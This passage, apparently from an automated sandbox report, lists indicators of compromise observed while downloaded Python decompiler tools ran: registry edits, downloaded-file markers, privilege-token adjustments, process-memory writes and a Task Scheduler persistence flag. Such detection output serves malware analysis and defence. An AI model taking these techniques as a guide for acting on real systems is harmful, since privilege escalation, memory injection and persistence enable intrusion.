Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\2\0\0\MRUListEx = 00000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = 00000000ffffffff	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\2\0\0\0\2\MRUListEx = ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Mode = "6"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\ICT = "133683495174820461"	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000100000000000000ffffffff	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\2\0\0\0\2\0\MRUListEx = ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133683495378340348"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\1\NodeSlot = "5"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\2\0\0 = 500031000000000002595a68100041646d696e003c0009000400efbe02597b63115924332e00000067e10100000001000000000000000000000000000000d4ef8300410064006d0069006e00000014000000	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).top = "76"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI\App	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\2\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\2\0\0\0\1\NodeSlot = "8"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\ITT = "133683495233740492"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\SniffedFolderType = "Generic"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133683495715133982"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\2\0\0\0\2	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).bottom = "676"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU\ICT = "133683498520050168"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\2\0\0\0\2\0 = 540031000000000011598533100070737574696c00003e0009000400efbe11598533115985332e000000d03602000000070000000000000000000000000000008e8d7200700073007500740069006c00000016000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133683496060755263"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\2\0\0	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000	firefox.exe

NTFS ADS 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\Downloads\PyDC_nov_2022.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\main.exe_extracted.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\de4py_x64_py3.11.exe:Zone.Identifier	firefox.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
3420	Explorer.EXE
3420	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4832	powershell.exe
4832	powershell.exe
844	powershell.exe
844	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
3420	Explorer.EXE
5748	powershell.exe
2536	firefox.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4832	powershell.exe
Token: SeDebugPrivilege	844	powershell.exe
Token: SeIncreaseQuotaPrivilege	844	powershell.exe
Token: SeSecurityPrivilege	844	powershell.exe
Token: SeTakeOwnershipPrivilege	844	powershell.exe
Token: SeLoadDriverPrivilege	844	powershell.exe
Token: SeSystemProfilePrivilege	844	powershell.exe
Token: SeSystemtimePrivilege	844	powershell.exe
Token: SeProfSingleProcessPrivilege	844	powershell.exe
Token: SeIncBasePriorityPrivilege	844	powershell.exe
Token: SeCreatePagefilePrivilege	844	powershell.exe
Token: SeBackupPrivilege	844	powershell.exe
Token: SeRestorePrivilege	844	powershell.exe
Token: SeShutdownPrivilege	844	powershell.exe
Token: SeDebugPrivilege	844	powershell.exe
Token: SeSystemEnvironmentPrivilege	844	powershell.exe
Token: SeRemoteShutdownPrivilege	844	powershell.exe
Token: SeUndockPrivilege	844	powershell.exe
Token: SeManageVolumePrivilege	844	powershell.exe
Token: 33	844	powershell.exe
Token: 34	844	powershell.exe
Token: 35	844	powershell.exe
Token: 36	844	powershell.exe
Token: SeIncreaseQuotaPrivilege	844	powershell.exe
Token: SeSecurityPrivilege	844	powershell.exe
Token: SeTakeOwnershipPrivilege	844	powershell.exe
Token: SeLoadDriverPrivilege	844	powershell.exe
Token: SeSystemProfilePrivilege	844	powershell.exe
Token: SeSystemtimePrivilege	844	powershell.exe
Token: SeProfSingleProcessPrivilege	844	powershell.exe
Token: SeIncBasePriorityPrivilege	844	powershell.exe
Token: SeCreatePagefilePrivilege	844	powershell.exe
Token: SeBackupPrivilege	844	powershell.exe
Token: SeRestorePrivilege	844	powershell.exe
Token: SeShutdownPrivilege	844	powershell.exe
Token: SeDebugPrivilege	844	powershell.exe
Token: SeSystemEnvironmentPrivilege	844	powershell.exe
Token: SeRemoteShutdownPrivilege	844	powershell.exe
Token: SeUndockPrivilege	844	powershell.exe
Token: SeManageVolumePrivilege	844	powershell.exe
Token: 33	844	powershell.exe
Token: 34	844	powershell.exe
Token: 35	844	powershell.exe
Token: 36	844	powershell.exe
Token: SeIncreaseQuotaPrivilege	844	powershell.exe
Token: SeSecurityPrivilege	844	powershell.exe
Token: SeTakeOwnershipPrivilege	844	powershell.exe
Token: SeLoadDriverPrivilege	844	powershell.exe
Token: SeSystemProfilePrivilege	844	powershell.exe
Token: SeSystemtimePrivilege	844	powershell.exe
Token: SeProfSingleProcessPrivilege	844	powershell.exe
Token: SeIncBasePriorityPrivilege	844	powershell.exe
Token: SeCreatePagefilePrivilege	844	powershell.exe
Token: SeBackupPrivilege	844	powershell.exe
Token: SeRestorePrivilege	844	powershell.exe
Token: SeShutdownPrivilege	844	powershell.exe
Token: SeDebugPrivilege	844	powershell.exe
Token: SeSystemEnvironmentPrivilege	844	powershell.exe
Token: SeRemoteShutdownPrivilege	844	powershell.exe
Token: SeUndockPrivilege	844	powershell.exe
Token: SeManageVolumePrivilege	844	powershell.exe
Token: 33	844	powershell.exe
Token: 34	844	powershell.exe
Token: 35	844	powershell.exe

Suspicious use of FindShellTrayWindow 56 IoCs

pid	Process
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
3460	7zG.exe
5768	7zG.exe
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
4556	de4py_x64_py3.11.tmp
3420	Explorer.EXE
2536	firefox.exe
2536	firefox.exe
6948	notepad.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
2536	firefox.exe
3420	Explorer.EXE
5748	powershell.exe
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
3420	Explorer.EXE
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe
2536	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1420 wrote to memory of 4024	1420	cmd.exe	90
PID 1420 wrote to memory of 4024	1420	cmd.exe	90
PID 1420 wrote to memory of 4832	1420	cmd.exe	91
PID 1420 wrote to memory of 4832	1420	cmd.exe	91
PID 4832 wrote to memory of 844	4832	powershell.exe	93
PID 4832 wrote to memory of 844	4832	powershell.exe	93
PID 3776 wrote to memory of 2536	3776	firefox.exe	100
PID 3776 wrote to memory of 2536	3776	firefox.exe	100
PID 3776 wrote to memory of 2536	3776	firefox.exe	100
PID 3776 wrote to memory of 2536	3776	firefox.exe	100
PID 3776 wrote to memory of 2536	3776	firefox.exe	100
PID 3776 wrote to memory of 2536	3776	firefox.exe	100
PID 3776 wrote to memory of 2536	3776	firefox.exe	100
PID 3776 wrote to memory of 2536	3776	firefox.exe	100
PID 3776 wrote to memory of 2536	3776	firefox.exe	100
PID 3776 wrote to memory of 2536	3776	firefox.exe	100
PID 3776 wrote to memory of 2536	3776	firefox.exe	100
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 2536 wrote to memory of 3576	2536	firefox.exe	101
PID 4832 wrote to memory of 1104	4832	powershell.exe	102
PID 4832 wrote to memory of 1104	4832	powershell.exe	102

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
1⤵
- Modifies registry class
PID:800
- C:\Windows\System32\rundll32.exe
  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
  2⤵
  PID:5692
- C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  2⤵
  PID:5340
- C:\Windows\system32\BackgroundTransferHost.exe
  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
  2⤵
  PID:5620
- C:\Windows\system32\BackgroundTransferHost.exe
  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
  2⤵
  PID:4204
- C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
  2⤵
  PID:5872
